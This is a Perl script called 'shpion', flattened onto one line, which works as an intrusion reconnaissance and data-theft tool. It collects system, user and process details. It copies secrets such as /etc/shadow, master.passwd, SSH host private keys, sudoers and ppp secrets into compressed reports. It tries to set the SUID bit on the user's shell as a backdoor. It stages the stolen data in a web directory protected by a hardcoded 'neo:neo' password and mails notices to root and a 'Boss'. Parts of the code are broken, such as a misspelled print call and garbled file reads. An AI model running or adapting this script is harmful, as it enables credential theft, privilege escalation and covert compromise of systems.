#!/usr/bin/perl #shpion.0.14 ##############################Some_chars_combination#################### # AR Architecture of machine (e.g. i86) # BT Time,that was at the beginning of the script is run # CD Current directory # CP CPU name # DM dmesg output # DO Domain # DS Directory structure # ER Error which not must be reported to stdout # ET Time,that was at the ending of the script is run # FL Failed # FS Output of 'mount','df' # HN Hostname # HD Hard drive # IC Interrupt counter # IP IP_address # IS Interrupt signal # KN Kernel version # LM ulimit,quota... # MF Get 'main' files # NF Not found # OS Operation System # PC ID of this process # PD Permision denied # PK list of install packages # PR /proc/ directory # PS output of 'ps' # RE Report file # SB Suid_bit # SP 'Shpion' - this program # SV Versions of installed software # UE User environment # UN Username # WH Output of w,who,finger... # WW Path/to/WWW ######################################################################## &my_define_glob_var; &my_signal_def; open REPORT,">$report" or &my_kill; open STDERR,">$report" or &my_kill; &my_time('begin'); #Begin time of script execution &my_ipcs; $n=&my_arc($n); &my_print_hostname; #Print Username,Hostname,Current_directory and other $n=&my_arc($n); #We must compress 'report_file' if FILESIZE>LIMIT/2 &my_suid; #Put SUID_BIT to $SHELL &my_print_env; #Print user environment $n=&my_arc($n); &my_print_who; #Get info about working users $n=&my_arc($n); &my_print_dmesg; #System boot info $n=&my_arc($n); &my_hdparm; $n=&my_arc($n); &my_print_fs; #Get info about files $n=&my_arc($n); &my_print_limit; #Print user's limits &my_print_ps; #Processes which run now $n=&my_arc($n); &my_print_ds; #Print directory structure #&my_print_ds_alt; very slowly #Will be in future &my_print_proc; #Print some files from /proc $n=&my_arc($n); &my_print_version; #Versions of some_software &my_print_packages; #List of install packages $n=&my_arc($n); &my_print_main_files; #Get 'main' files if possibly &my_print_ic; #Interrupt counter $n=&my_arc($n); &my_time('end'); #End time of script execution #&my_exit; #NOT_WORK $n=&my_arc($n,'now'); &my_local_mail; &my_remote_mail; &my_public_in_www; #Public info.[bz2|gz] on web if user has www_account close(REPORT); #*********************************************************************** sub my_arc{ my $result=$_[0]; my $blocksize=1024; my $ln_rep=(stat($report))[7]; my $sync=`which sync 2>/dev/null`; my $bash=`which bash 2>/dev/null`; my $bzip2=`which bzip2 2>/dev/null`; my $gzip=`which gzip 2>/dev/null`; my $ln_lim; chomp($sync); chomp($bash); chomp($bzip2); chomp($gzip); if(-e($sync)){ if(-x($sync)){ system("$sync 1>/dev/null 2>/dev/null") } else{print REPORT "PD $sync\n"} } else{print REPORT "NF sync\n"} if(-e($bash)){ if(-x($bash)){ $ln_lim=`$bash -c "ulimit -f 2>/dev/null"` } else{print REPORT "PD $bash\n"} } else{print REPORT "NF bash\n"} if($ln_lim=~/unlimited/i){$ln_lim=999999999} if($ln_lim){$ln_lim*=$blocksize}else{$ln_lim=300000} if($ln_rep>($ln_lim/2)or($_[1] eq 'now')){ $result++; close(REPORT)or &my_kill; rename("$report","$report.$result"); if(-e($bzip2)){ if(-x($bzip2)){ system("bzip2 -z $report.$result 2>&1") } else{print REPORT "PD $bzip2\n"} } elsif(-e($gzip)){ if(-x($gzip)){ system("gzip $report.$result 1>/dev/null 2>/dev/null") } else{print REPORT "PD $gzip\n"} } else{ print REPORT "NF bzip2\nNF gzip\n"; &my_kill } unless($_[1] eq 'now'){open REPORT,">$report" or &my_kill} } return $result } #_______________________________________________________________________ sub my_define_glob_var{ chomp($username=`whoami 2>/dev/null`); chomp($hostname=`hostname -s 2>/dev/null`); chomp($domain=`hostname -d 2>/dev/null`); chomp($ip=`hostname -i 2>/dev/null`); chomp($arc=`uname -m 2>/dev/null`); chomp($kernel=`uname -r 2>/dev/null`); chomp($os=`uname -s 2>/dev/null`); chomp($os_ver=`uname -v 2>/dev/null`); chomp($proc=`uname -p 2>/dev/null`); chomp($process_id=$$); chomp($shpion=$0); #this script name chomp($www_path='/home/liam/public_html'); #path to user_www_directory,comment if you don't want public report chomp($cur_dir=`pwd 2>/dev/null`); #Current_directory chomp($report=$cur_dir.'/info'); #REPORT_FILE $send_mail=1; #mail report : 1=true,other=false $n=0; #number of REPORT_FILE.[b|g]zip $ic=0; #interrupt counter } #_______________________________________________________________________ sub my_exit{ print REPORT "\$\$EX\nRM $report "; if(unlink($report)){print REPORT "OK\n"} else{print REPORT "FL\n"} } #_______________________________________________________________________ sub my_ipcs{ my $output; my $ipcs=`which ipcs 2>/dev/null`; chomp($ipcs); print REPORT "\$\$IPCS\n"; if(-e($ipcs)){ if(-x($ipcs)){ foreach my $arg(qw ! -u -t -p -c -l !){ chomp($output=`$ipcs $arg 2>/dev/null`); print REPORT "$ipcs $arg $output" } } else{print REPORT "PD $ipcs\n"} } else{print REPORT "NF ipcs\n"} } #_______________________________________________________________________ sub my_hdparm{ if($os=~/linux/i){ my ($dev,$str); my $hdparm=`which hdparm 2>/dev/null`; chomp($hdparm); if(-e($hdparm)){ if(-x($hdparm)){ open FSTAB,"/etc/fstab" or &my_or_die; while(defined($str=)){ if($str=~/(\/dev\/hd[a-z])/i){$dev=$1;break} elsif($str=~/(\/dev\/sd[a-z])/i){$dev=$1;break} else{$dev="/dev/hda";break} } close(FSTAB); print REPORT "\$\$HD\n$dev\n",`$hdparm -abcCdgiIkmnru $dev 2>&1`; print REPORT "/dev/cdrom\n",`$hdparm -abcCdgiIkmnru /dev/cdrom 2>&1`; } else{print REPORT "PD $hdparm\n"} } else{print REPORT "NF hdparm\n"} } } #_______________________________________________________________________ sub my_kill{ my $f; print REPORT "\$\$DI\nLAST_ERR_MSG:$!\n"; foreach $f(glob "$report*"){ print REPORT "RM $f"; if(unlink($f)){print REPORT "OK\n"} else{print REPORT "FL\n"} } } #_______________________________________________________________________ sub my_local_mail{ if($send_mail eq 1){ chomp(my $mail=`which mail 2>/dev/null`); my $user="root"; if(-e($mail)){ if(-x($mail)){ open MAIL,"|$mail -s shpions_report $user"; print MAIL "Hello $user!\nMy name is Shpion\nI have some info about $hostname.$domain [$ip]\nYou must read this ...\n"; close MAIL } else{print REPORT "PD $mail\n"} } else{print REPORT "NF mail\n"} } } #_______________________________________________________________________ sub my_or_die{ print REPORT "\$\$ER\n$!\n" } #_______________________________________________________________________ sub my_print_dmesg{ my $dmesg=`which dmesg 2>/dev/null`; chomp($dmesg); print REPORT "\$\$DM\n"; if(-e($dmesg)){ if(-x($dmesg)){ print REPORT `$dmesg 2>&1` } else{print REPORT "PD $dmesg\n"} } else{print REPORT "NF dmesg\n"} } #_______________________________________________________________________ sub my_print_ds{ my($dir,@dirs); if($os=~/linux/i){ @dirs=qw[ / /bin /sbin /etc /dev /usr/bin /usr/X11R6/bin /lib /lib/security /usr/lib /usr/X11R6/lib /var/lib /var/log /var/spool/mail /var/run /var/www/cgi-bin /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ] } elsif($os=~/openbsd/i){ @dirs=qw[ / bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc /dev /usr /tmp /home /mnt /var /var/log /var/www/cgi-bin /usr/lib /usr/libexec /usr/local/lib /usr/local/libexec ] } else{ @dirs=qw[ / /bin /sbin /etc /dev /usr/bin /usr/X11R6/bin /lib /usr/lib /var/log /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ] } print REPORT "\$\$DS\n"; foreach $dir(@dirs){ if(-e $dir){ if(-r $dir){ print REPORT "DS $dir\n",`ls -lag $dir` } else{ print REPORT "PD $dir\n" } } else{ print REPORT "NF $dir\n" } $n=&my_arc($n); } } #_______________________________________________________________________ sub my_print_ds_alt{ my($dir,$f); print REPORT "\$\$DS\n"; foreach $dir(qw[ / /bin /sbin /etc /usr/bin /usr/X11R6/bin /lib /usr/lib /var/log /boot /tmp /home /etc/rc.d /etc/rc.d/init.d /etc/rc.d/rc3.d /etc/rc.d/rc5.d ]){ print REPORT "DS $dir\n"; print REPORT "Filename # mode # uid # gid # size[blocks] # dev # inode # num_link # rdev # atime # mtime # ctime"; foreach $f(glob "$dir/.* $dir/*"){ print REPORT "$f#",(lstat $f)[2],"#",(lstat $f)[4],"#",(lstat $f)[5],"#",(lstat $f)[7],"[",(lstat $f)[12],"]#",(lstat $f)[0],"#",(lstat $f)[1],"#",(lstat $f)[3],"#",(lstat $f)[6],"#",(lstat $f)[8],"#",(lstat $f)[9],"#",(lstat $f)[10],"\n"; } $n=&my_arc($n) } } #_______________________________________________________________________ sub my_print_env{ print REPORT "\$\$UE\nPATH=$ENV{'PATH'}\nCDPATCH=$ENV{'CDPATCH'}\nSHELL=$ENV{'SHELL'}\nENV=$ENV{'ENV'}\nHOME=$ENV{'HOME'}\nMAIL=$ENV{'MAIL'}\nMAILCHECK=$ENV{'MAILCHECK'}\nMAILPATH=$ENV{'MAILPATH'}\nHISTSIZE=$ENV{'HISTSIZE'}\nHISTFILESIZE=$ENV{'HISTFILESIZE'}\n" } #_______________________________________________________________________ sub my_print_fs{ chomp(my $df=`which df 2>/dev/null`); chomp(my $mount=`which mount 2>/dev/null`); print REPORT "\$\$FS\n"; if(-e($df)){ if(-x($df)){ print REPORT "df\n",`$df 2>&1` } else{print REPORT "PD $df\n"} } else{print REPORT "NF df\n"} if(-e($mount)){ if(-x($mount)){ print REPORT "mount\n",`$mount 2>&1` } else{print REPORT "PD $mount\n"} } else{print REPORT "NF mount\n"} } #_______________________________________________________________________ sub my_print_hostname{ print REPORT "\$\$CD\n$cur_dir\n\$\$UN\n$username\n\$\$HN\n$hostname\n\$\$DO\n$domain\n\$\$IP\n$ip\n\$\$AR\n$arc\n\$\$OS\n$os\n$os_ver\n"; print REPORT "\$\$KN\n$kernel\n\$\$CP\n$proc\n\$\$PC\n$process_id\n\$\$SP\n$shpion\n\$\$WW\n$www_path\n\$\$RE\n$report\n" } #_______________________________________________________________________ sub my_print_ic{ print REPORT "\$\$IC\n$ic\n" } #_______________________________________________________________________ sub my_print_limit{ my $bash=`which bash 2>/dev/null`; chomp($bash); print REPORT "\$\$LM\n"; if(-e($bash)){ if(-x($bash)){ print REPORT `($bash -c "ulimit -a" ) 2>&1` } else{print REPORT "PD $bash\n"} } else{print REPORT "NF bash\n"} } #_______________________________________________________________________ sub my_print_main_files{ my ($f,$str); my @main_files=qw[ /etc/passwd /etc/group]; print REPORT "\$\$MF\n"; if($os=~/linux/i){ @main_files=qw[ /etc/passwd /etc/shadow /var/log/messages /var/log/boot.log /var/ftp/etc/passwd /var/ftp/etc/group /etc/aliases /etc/anacrontab /etc/crontab /etc/diskcheck.conf /etc/ftpacces /etc/ftphosts /etc/ftpusers /etc/group /etc/host.conf /etc/hosts.allow /etc/hosts.deny /etc/issue /etc/issue.net /etc/ld.so.conf /etc/lilo.conf /etc/login.defs /etc/logrotate.conf /etc/mail.rc /etc/motd /etc/fstab /etc/named.conf /etc/pwdb.conf /etc/profile /etc/securetty /etc/sendmail.cf /etc/services /etc/shells /etc/sudoers /etc/sysctl.conf /etc/syslog.conf /etc/inetd.conf /etc/xinetd.conf /etc/cron.d/sysstat /etc/httpd/conf/httpd.conf /etc/httpd/conf/access.conf /etc/httpd/conf/srm.conf /etc/mail.access /etc/mail/domaintable /etc/mail/local-host-names /etc/mail/trusted-users /etc/ppp/chap-secrets /etc/ppp/pap-secrets /etc/security/access.conf /etc/sysconfig/networking/ifcfg-lo /etc/ssh/sshd_config /etc/ssh/ssh_config /etc/tripwire/twcfg.txt /etc/tripwire/twpol.txt /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit ]} if($os=~/openbsd/i){ @main_files=qw[ /etc/passwd /etc/master.passwd /.cshrc /.profile /etc/adduser.conf /etc/adduser.message /etc/csh.cshrc /etc/csh.login /etc/csh.logout /etc/daily /etc/exports /etc/fbtab /etc/fstab /etc/ftpchroot /etc/ftpusers /etc/group /etc/hosts /etc/hosts.equiv /etc/inetd.conf /etc/ksh.kshrc /etc/kerberosIV/krb.conf /etc/kerberosV/krb.conf /etc/login.conf /etc/mail.rc /etc/mailer.conf /etc/monthly /etc/motd /etc/mrouted.conf /etc/myname /etc/mail/aliases /etc/mail/localhost.cf /etc/mail/sendmail.cf /etc/mail/submit.cf /etc/nat.conf /etc/netstart /etc/networks /etc/newsyslog.conf /etc/phones /etc/printcap /etc/protocols /etc/ppp/pap-secrets /etc/ppp/chap-secrets /etc/ppp/ppp.secret /etc/rc /etc/rc.conf /etc/rc.local /etc/rc.securelevel /etc/rc.shutdown /etc/remote /etc/rpc /etc/security /etc/services /etc/shells /etc/skeykeys /etc/sudoers /etc/sysctl.conf /etc/syslog.conf /etc/skel/.cshrc /etc/skel/.login /etc/skel/.mailrc /etc/skel/.profile /etc/skel/.rhosts /etc/sliphome/slip.hosts /etc/sliphome/slip.login /etc/ssh/ssh_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_rsa_key.pub /etc/ssh/sshd_config /etc/ssl/openssl.cnf /etc/ttys /etc/weekly /var/cron/tabs/root /var/cron/log /var/www/conf/httpd.conf /var/www/conf/access.conf /var/www/conf/srm.conf /var/log/adduser /var/log/authlog /var/log/daemon /var/log/ftpd /var/log/maillog /var/log/messages /var/log/secure /var/log/xferlog ]} if($os=~/freebsd/i){ @main_files=qw[ /etc/passwd /etc/master.passwd ]} foreach $f(@main_files){ $n=&my_arc($n); if(-e($f)){ if(-r($f)){ open FILE,$f or next; print REPORT "MF $f\n"; while(defined($str=)){ s#^\s+##; s#\s+$##; if($str=~/^#/){next}; if($str=~/^\n+/){next}; print REPORT $str; } } else {print REPORT "PD $f\n"} } else {print REPORT "NF $f\n"} } } #_______________________________________________________________________ sub my_print_packages{ if($os=~/linux/i){ my $rpm=`which rpm 2>/dev/null`; chomp($rpm); print REPORT "\$\$PK\n"; if(-e($rpm)){ if(-x($rpm)){ print REPORT `(($rpm -qa)|sort) 2>&1` } else{print REPORT "PD $rpm\n"} } else{print REPORT "NF rpm\n"} } if($os=~/openbsd/i){ my $pkginfo=`which pkg_info 2>/dev/null`; chomp($pkginfo); if(-e($pkginfo)){ if(-x($pkginfo)){ print REPORT `($pkginfo|sort) 2>&1` } else{print REPORT "PD $pkginfo\n"} } else{print REPORT "NF pkg_info\n"} } } #_______________________________________________________________________ sub my_print_proc{ if($os=~/linux/i){ my ($f,$str); print REPORT "\$\$PR\n"; if(-e('/proc')){ if(-r('/proc')){ foreach $f(qw [ cpuinfo devices dma filesystems interrupts iomem ioports meminfo modules partitions pci slabinfo stat swaps version ]){ print REPORT "PR /proc/$f\n"; if(-e("/proc/$f")){ if(-r("/proc/$f")){ open FILE,")){ print REPORT "$str"; } close(FILE) } else{ print REPORT "PD /proc/$f" } } else{ print REPORT "NF /proc/$f" } } } else {print REPORT "PD /proc\n"} } else{print REPORT "NF /proc\n"} } } #_______________________________________________________________________ sub my_print_ps{ my $ps=`which ps 2>/dev/null`; chomp($ps); print REPORT "\$\$PS\n"; if(-e($ps)){ if(-x($ps)){ if($os=~/linux/i){ print REPORT `$ps -elf 2>&1` } elsif($os=~/openbsd/i){ print REPORT `$ps -aux 2>&1` } else{ rpint REPORT `$ps 2>&1` } } else{print REPORT "PD $ps\n"} } else{print REPORT "NF ps\n"} } #_______________________________________________________________________ sub my_print_version{ my ($prog,$soft,$softv); print REPORT "\$\$SV\n"; foreach $prog(qw ! gcc perl sh bash bash2 httpd rpm !){ chomp($soft=`which $prog 2>/dev/null`); if(-e($soft)){ if(-x($soft)){ $softv=`$soft --version 2>/dev/null` } else{print REPORT "PD $soft\n"} } else{print REPORT "NF $prog\n"} if($softv=~/[0-9][0-9.]*/){$softv=$&}; print REPORT "$soft:$softv\n"; } } #_______________________________________________________________________ sub my_print_who{ my($prog,$f); print REPORT "\$\$WH\n"; foreach $f(qw !w who finger lastlog last !){ chomp($prog=`which $f 2>/dev/null`); if(-e($prog)){ if(-x($prog)){ print REPORT "$prog\n",`$prog 2>&1` } else{print REPORT "PD $prog\n"} } else{print REPORT "NF $f\n"} } } #_______________________________________________________________________ sub my_public_in_www{ if(defined($www_path)){ my $f; my $www_shp=$www_path.'/shpion'; my $www_acs=$www_shp.'/.htaccess'; my $www_psw=$www_shp.'/.htpasswd'; my $cp=`which cp 2>/dev/null`; unless(-e($www_shp)){mkdir($www_shp,0077) or &my_or_die} if(-e($cp)){ if(-x($cp)){ foreach $f(glob "$report*"){ system("$cp $f $www_shp 1>/dev/null 2>/dev/null") } } else{print REPORT "PD $cp\n";return} } else{print REPORT "NF cp\n";return} open HTPASSWD,">$www_psw" or &my_or_die; print HTPASSWD "neo:neo\n"; close(HTPASSWD); chmod(0640,$www_psw); open HTACCESS,">$www_acs" or &my_or_die; print HTACCESS "AuthType Basic\nAuthName \"Shpion directory\"\nAuthUserFile $www_shp/.htpasswd\nRequire valid-user\n"; close(HTACCESS) } } #_______________________________________________________________________ sub my_remote_mail{ if($send_mail eq 1){ chomp(my $mail=`which sendmail 2>/dev/null`); if(-e($mail)){ if(-x($mail)){ unless(open(SENDMAIL,"|$mail -oi -t")){&my_or_die;return} print SENDMAIL <<"EOF"; From: Big Daddy To: Boss Subject: Shpions report No Work now EOF close(SENDMAIL); } else{print REPORT "PD $mail\n"} } else{print REPORT "NF mail\n"} } } #_______________________________________________________________________ sub my_signal_def{ my $sig; foreach $sig(qw !INT STOP HUP ABRT FPE ILL SEGV TERM !){ #add CHLD if you want TONNES of chars 'CHLD' in REPORT_FILE $SIG{$sig}=my_sigget } } #_______________________________________________________________________ sub my_sigget{ my $signal=shift; my $time=localtime; $ic++; print REPORT "\$\$IS\n$signal\n",(localtime $time),"\n" } #_______________________________________________________________________ sub my_suid{ my $have='not has'; my $shell=$ENV{'SHELL'}; chomp($shell); print REPORT "\$\$SB\n"; unless(system("chmod +s $shell 1>/dev/null 2>/dev/null")){$have='has'}; print REPORT "$shell $have SUID bit\n" } #_______________________________________________________________________ sub my_time{ my $lt=localtime; if($_[0]=~/begin/i){print REPORT "\$\$BT\n",(localtime $lt),"\n"} if($_[0]=~/end/i){print REPORT "\$\$ET\n",(localtime $lt),"\n"} print REPORT "$lt\n" }